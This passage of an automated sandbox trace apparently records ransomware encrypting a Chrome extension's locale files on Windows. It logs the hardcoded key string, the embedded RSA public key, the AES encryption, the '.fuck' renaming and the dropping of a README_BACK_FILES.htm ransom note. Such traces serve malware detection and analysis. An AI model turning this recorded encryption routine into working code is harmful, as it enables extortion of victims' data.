Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.gsg")) returned 1 [0254.994] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.fuck")) returned 1 [0254.996] CryptDestroyHash (hHash=0x2e18128) returned 1 [0254.996] CryptDestroyKey (hKey=0x2e18828) returned 1 [0254.996] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.996] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.996] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.996] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\readme_back_files.htm")) returned 0xffffffff [0254.997] AreFileApisANSI () returned 1 [0254.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.997] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.998] GetFileType (hFile=0x5d50) returned 0x1 [0254.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.999] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.999] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.000] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.000] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.000] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.000] GetLastError () returned 0x0 [0255.000] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json")) returned 0x20 [0255.001] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0255.001] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.002] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.003] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.003] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.006] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.006] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.006] CryptHashData (hHash=0x2e18828, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.006] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e180e8) returned 1 [0255.006] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.006] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.006] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11128) returned 1 [0255.006] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11128, dwCertEncodingType=0x1, pInfo=0x298fd30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298fd60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298fd68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18aa8) returned 1 [0255.007] CryptEncrypt (in: hKey=0x2e18aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.007] CryptEncrypt (in: hKey=0x2e18aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10138*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10138*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.007] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10138*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10138*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.008] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb6, lpOverlapped=0x0) returned 1 [0255.010] CryptEncrypt (in: hKey=0x2e180e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.010] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.010] CloseHandle (hObject=0x5d60) returned 1 [0255.010] CloseHandle (hObject=0x5d5c) returned 1 [0255.011] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0255.017] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0255.017] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.gsg")) returned 1 [0255.018] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.fuck")) returned 1 [0255.020] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.020] CryptDestroyKey (hKey=0x2e180e8) returned 1 [0255.020] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.020] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.020] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.020] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0255.020] AreFileApisANSI () returned 1 [0255.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.020] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.021] GetFileType (hFile=0x5d50) returned 0x1 [0255.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.022] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.022] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.023] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.023] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.023] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.023] GetLastError () returned 0x0 [0255.023] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json")) returned 0x20 [0255.023] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json", dwFileAttributes=0x80) returned 1 [0255.024] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.024] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.027] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.028] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.030] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.030] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.030] CryptHashData (hHash=0x2e18828, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.030] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.030] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.030] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.030] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10600) returned 1 [0255.031] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10600, dwCertEncodingType=0x1, pInfo=0x2991250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991280*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991288*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ca8) returned 1 [0255.031] CryptEncrypt (in: hKey=0x2e18ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.031] CryptEncrypt (in: hKey=0x2e18ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e101c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e101c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.031] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e101c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e101c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.033] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x16a, lpOverlapped=0x0) returned 1 [0255.034] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x16a, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0255.034] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0255.034] CloseHandle (hObject=0x5d5c) returned 1 [0255.034] CloseHandle (hObject=0x5d60) returned 1 [0255.034] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), bFailIfExists=0) returned 1 [0255.038] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json", dwFileAttributes=0x0) returned 1 [0255.038] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.gsg")) returned 1 [0255.040] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.fuck")) returned 1 [0255.041] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.041] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.041] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.041] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.041] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.041] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\readme_back_files.htm")) returned 0xffffffff [0255.041] AreFileApisANSI () returned 1 [0255.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.041] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.042] GetFileType (hFile=0x5d50) returned 0x1 [0255.042] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.044] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.044] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.045] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: 